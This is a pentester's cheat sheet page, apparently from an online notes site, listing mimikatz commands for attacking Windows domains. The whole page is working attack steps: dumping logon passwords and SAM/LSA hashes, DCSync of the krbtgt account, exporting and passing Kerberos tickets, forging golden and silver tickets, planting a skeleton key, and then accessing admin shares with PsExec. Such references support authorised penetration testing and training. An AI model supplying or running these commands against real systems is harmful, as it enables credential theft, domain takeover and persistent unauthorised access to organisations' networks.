mimikatz

nishang/Gather/Invoke-Mimikatz.ps1

.\mimikatz 'COMMAND' exit

check

privilege::debug
# Privilege '20' OK => Working properly

dump password / hashes

# dump logon users pass
sekurlsa::logonpasswords

# dump hashes
lsadump:sam
lsadump::lsa [/inject | /patch]
# hashcat -m 1000 <hash>

dcsync

lsadump::dcsync /user:krbtgt

elevate shell integrity

# use when using evil-winrm, we get medium integrity shells
token::elevate

Pass-the-ticket

# exports all .kirbi to current directory
sekurlsa::tickets /export

# PTT using admin .kirbi 
kerberos::ptt TICKET

# to check if ticket is working
> klist

Golden / Silver Ticket

# dump hash and SID
lsadump::lsa /inject /name: [krbtgt | DOMAIN_ADMIN_ACCOUNT | SERVICE_ACCOUNT] 

# create golden ticket and pass-the-ticket
kerberos::golden /user:Administrator /domain:DOMAIN /sid:SID /krbtgt:KRBTGT_NTLM_HASH /id:500 /ptt
# create silver ticket and pass-the-ticket
kerberos::golden /user:<USER> /domain:DOMAINM /sid:SID /krbtgt:SERVICE_NTLM_hash /id:1103 /ptt

# check
misc::cmd
dir \\IP\c$ [/user:USER PASS]
PsExec.exe \\IP cmd.exe

kerberos Skeleton Key

misc::skeleton

# done, now accessing admin share
> net use C:\\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz
> dir \\Desktop-1\c$ /user:Machine1 mimikatz

Previousjinja2 flask template injection Nextpowershell

Last updated 4 years ago

Was this helpful?